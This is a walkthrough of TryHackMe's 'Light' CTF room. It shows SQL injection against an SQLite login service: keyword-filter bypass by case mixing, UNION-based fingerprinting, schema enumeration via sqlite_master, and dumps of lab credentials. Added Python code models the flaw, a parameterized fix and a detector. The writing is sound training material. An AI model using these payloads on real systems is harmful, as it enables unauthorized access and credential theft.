Introduction

Detailed walkthrough of the Light CTF challenge on TryHackMe.

Description

I am working on a database application called Light! Would you like to try it out? If so, the application is running on port 1337. You can connect to it using nc 10.10.95.233 1337. You can use the username smokey in order to get started.

Enumeration

echo "10.10.95.233 light.thm" | sudo tee -a /etc/hosts

This maps the IP to the domain light.thm. The write goes through tee because sudo only elevates the command, not the shell's redirection into /etc/hosts.

Netcat

The service returns the password whenever a valid username is entered.

$ nc light.thm 1337 
Welcome to the Light database!
Please enter your username: smokey
Password: vYQ5ngPpw8AdUmL
Please enter your username: Mike
Username not found.

nmap

Let’s scan for other open ports on this IP.

$ nmap light.thm -sV -sC -p-          
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 8.2p1 Ubuntu 4ubuntu0.9 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 61:c5:06:f2:4a:20:5b:cd:09:4d:72:b0:a5:aa:ce:71 (RSA)
|   256 51:e0:5f:fa:81:64:d3:d9:26:24:16:ca:45:94:c2:00 (ECDSA)
|_  256 77:e1:36:3b:95:9d:e0:3e:0a:56:82:b2:9d:4c:fe:1a (ED25519)
1337/tcp open  waste?
| fingerprint-strings: 
|   DNSStatusRequestTCP, DNSVersionBindReqTCP, Kerberos, NULL, RPCCheck, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServerCookie, X11Probe: 
|     Welcome to the Light database!
|     Please enter your username:
|   FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, RTSPRequest: 
|     Welcome to the Light database!
|     Please enter your username: Username not found.
|_    Please enter your username:
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Smokey's password does not get us a shell over SSH, so let's analyze the behavior of the database service on port 1337 instead.

Response analysis

Please enter your username: '
Error: unrecognized token: "''' LIMIT 30"
Please enter your username: '--
For strange reasons I can't explain, any input containing /*, -- or, %0b is not allowed :)
Please enter your username: 'error  
Error: near "error": syntax error
Please enter your username: error'        
Error: unrecognized token: "'error'' LIMIT 30"
Please enter your username: 'union
Ahh there is a word in there I don't like :(

Supplying different inputs produces database errors. Based on the inputs and responses above, the SQL query being built appears to be:

select password from users where username='input' LIMIT 30

Bypassing detection

Let’s attempt to use some SQL keywords here.

Please enter your username: select
Ahh there is a word in there I don't like :(
Please enter your username: union
Ahh there is a word in there I don't like :(

It detects the strings select and union and responds with "Ahh there is a word in there I don't like :(". Let's attempt to bypass this. By changing the case of the word, I was able to bypass it.

Please enter your username: Union
Username not found.
Please enter your username: Select
Username not found.

Mixing uppercase and lowercase in keywords such as SELECT and UNION bypasses the filter, which evidently matches the blocked words case-sensitively.
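To make the inferred query and the filter concrete, here is an added example (not the room's code) that rebuilds the lookup against a constructed in-memory SQLite database: the vulnerable version models the case-sensitive blacklist and string concatenation seen above, and the fixed version binds the username as a parameter. The table name usertable is taken from the schema dumped later in the walkthrough; the sample row reuses smokey's credentials from the page.

```python
import sqlite3

# Constructed stand-in for the room's database: the usertable schema recovered
# later from sqlite_master, holding only the smokey row shown on the page.
def make_db():
    con = sqlite3.connect(":memory:")
    con.executescript("""
        CREATE TABLE usertable (id INTEGER PRIMARY KEY, username TEXT, password TEXT);
        INSERT INTO usertable (username, password) VALUES ('smokey', 'vYQ5ngPpw8AdUmL');
    """)
    return con

# The tokens the service rejects, as its own messages describe them.
BLOCKED_TOKENS = ("select", "union", "--", "/*", "%0b")

def lookup_vulnerable(con, username):
    """Model of the behaviour inferred above: a case-sensitive substring
    blacklist, then the username concatenated straight into the SQL text."""
    if any(tok in username for tok in BLOCKED_TOKENS):
        return "Ahh there is a word in there I don't like :("
    query = f"select password from usertable where username='{username}' LIMIT 30"
    try:
        row = con.execute(query).fetchone()
    except sqlite3.Error as exc:
        return f"Error: {exc}"           # the leaky error messages seen on the page
    return f"Password: {row[0]}" if row else "Username not found."

def lookup_fixed(con, username):
    """Hardened form: the username is bound as a parameter, so it is always
    data and never SQL, and the keyword blacklist becomes unnecessary."""
    row = con.execute(
        "SELECT password FROM usertable WHERE username = ? LIMIT 30", (username,)
    ).fetchone()
    return f"Password: {row[0]}" if row else "Username not found."

if __name__ == "__main__":
    db = make_db()
    for probe in ("smokey", "'", "union", "'Union Select sqlite_version()'"):
        print(f"{probe!r:40} vulnerable -> {lookup_vulnerable(db, probe)}")
        print(f"{'':40} fixed      -> {lookup_fixed(db, probe)}")
```

The same mixed-case probe that returns the SQLite version from the vulnerable function is just an unknown username to the parameterized one.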

Detecting the DBMS

Let’s attempt a union-based attack.

Please enter your username: 'Union Select true'
Password: 1
Please enter your username: 'Union Select false'
Password: 0

Union-based queries work. Next, let's identify the backend by trying the version functions of several database engines in turn.

Please enter your username: 'Union Select @@version'
Error: unrecognized token: "@"
Please enter your username: 'Union Select %40%40version'
Error: near "%": syntax error
Please enter your username: 'Union Select version()'
Error: no such function: version
Please enter your username: 'Union Select v$version'
Error: no such column: v$version
Please enter your username: 'Union Select banner FROM v$version'
Error: no such table: v$version
Please enter your username: 'Union Select version FROM v$instance'
Error: no such table: v$instance
Please enter your username: 'Union Select sqlite_version()'
Password: 3.31.1

Only sqlite_version() succeeds, so the backend is SQLite 3.31.1.
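The probing sequence above also shows why matching a few lowercase tokens is a poor defence. As an added example (not part of the walkthrough or the room's code), the detector below normalises captured username values before checking them, so the case mixing, URL encoding and %0b whitespace tricks seen here are caught; the keyword list and the sample inputs are my own constructions modelled on this session.

```python
import re
from urllib.parse import unquote

# Keywords and comment tokens the Light service tries to block, applied here
# after normalisation instead of as raw, case-sensitive substring matches.
SQL_KEYWORDS = ("select", "union", "from", "where")
COMMENT_TOKENS = ("--", "/*")

def normalize(value):
    """Undo the cheap evasions seen above: URL-encoding (including a doubly
    encoded quote), upper/lower case mixing, and odd whitespace such as %0b."""
    decoded = unquote(unquote(value))
    return re.sub(r"\s+", " ", decoded).lower()

def classify(value):
    """Return the reasons a captured username value looks like SQL injection
    (an empty list means nothing suspicious)."""
    n = normalize(value)
    reasons = []
    if "'" in n or '"' in n:
        reasons.append("quote")
    if any(tok in n for tok in COMMENT_TOKENS):
        reasons.append("comment")
    if re.search(r"\b(" + "|".join(SQL_KEYWORDS) + r")\b", n):
        reasons.append("keyword")
    if re.search(r"\bsqlite_(master|version)\b|\bpragma_table_info\b", n):
        reasons.append("schema-probe")
    return reasons

# Constructed sample, modelled on the session above plus a URL-encoded variant.
SAMPLE_INPUTS = [
    "smokey",
    "Mike",
    "'--",
    "Union",
    "'Union Select sqlite_version()'",
    "'Union sELECT GROUP_CONCAT(name) FROM pragma_table_info('usertable')'",
    "%27Union%0bSelect%0btrue%27",
]

def scan(values):
    """Map each suspicious value to its reasons; clean values are omitted."""
    flagged = {}
    for value in values:
        reasons = classify(value)
        if reasons:
            flagged[value] = reasons
    return flagged
```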

Dumping DBMS Structure

Let's use SQLite-specific queries against sqlite_master to enumerate the schema and then dump the data.

Please enter your username: 'Union Select sql From sqlite_master'
Password: CREATE TABLE admintable (
                   id INTEGER PRIMARY KEY,
                   username TEXT,
                   password INTEGER)
Please enter your username: SELECT    
Ahh there is a word in there I don't like :(
Please enter your username: 'Union sELECT group_concat(tbl_name) FROM sqlite_master WHERE type='table' and tbl_name NOT like 'sqlite_%''
Password: usertable,admintable

We have obtained the table names here.

Please enter your username: 'Union sELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('usertable')'
Password: id,username,password
Please enter your username: 'Union sELECT GROUP_CONCAT(name) AS column_names FROM pragma_table_info('admintable')'      
Password: id,username,password

We have retrieved the column names here.

Dumping all data

Please enter your username: 'Union Select GROUP_CONCAT(username) from usertable'
Password: alice,rob,john,michael,smokey,hazel,ralph,steve                                    
Please enter your username: 'Union Select GROUP_CONCAT(password) from usertable'             
Password: tF8tj2o94WE4LKC,yAn4fPaF2qpCKpR,e74tqwRh2oApPo6,7DV4dwA0g5FacRe,vYQ5ngPpw8AdUmL,EcSuU35WlVipjXG,YO1U9O1m52aJImA,WObjufHX1foR8d7                                         

We have extracted the data from usertable.

Please enter your username: 'Union Select GROUP_CONCAT(username) from admintable'            
Password: T**********n,flag                                                                
Please enter your username: 'Union Select GROUP_CONCAT(password) from admintable'
Password: mam***************q17,THM{S********************nO?}
Please enter your username: 

We have extracted the data from the admintable, and this marks the end of the CTF.

Happy Hacking !!! 😎